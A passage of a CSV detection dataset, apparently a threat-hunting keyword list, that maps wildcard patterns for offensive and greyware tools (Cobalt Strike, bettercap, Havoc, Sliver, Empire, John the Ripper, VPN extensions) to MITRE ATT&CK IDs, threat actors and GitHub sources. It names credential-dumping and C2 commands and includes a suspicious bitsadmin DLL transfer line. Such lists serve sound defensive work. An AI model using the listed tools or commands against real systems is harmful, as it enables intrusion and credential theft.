T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap -iface eth0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network 
Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*betterdefaultpasslist*","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","585","151","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z" +"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*bfidboloedlamgdmenmlbipfnccokknp*","greyware_tool_keyword","PureVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bgetprivs*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are 
security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bhashdump*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bhnhkdgoefpmekcgnccpnhjfdgicfebm*","greyware_tool_keyword","Wachee VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bhttp_x64.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection 
capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*bibjcjfmgapbfoljiojpipaooddpkpai*","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bigb0sss/goPassGen*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" +"*bihhflimonbpcfagfadcnbbdngpopnjb*","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bihmplhobchoageeokmgbdihknkjbknd*","greyware_tool_keyword","Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" 
+"*bin/*/PS2EXE/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*bin/bof_c.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*bin/bof_nim.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*bin/dll/merlin.c*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*bin/icmpsh/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/ldd2pretty*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*bin/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*bin/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*bin/SillyRAT/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*bin/void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
+"*Bin\bin32\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Bin\bin64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*bin\SillyRAT*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin\void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*binderlabs/DirCreate2System*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*binwalk -e image.png*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 
- TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9643","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z" +"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bitquark_top100k_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BitsadminStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Biu-framework*","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - 
T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BKDR_JSPSHELL.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bkerberos_ccache_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkerberos_ticket_purge*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
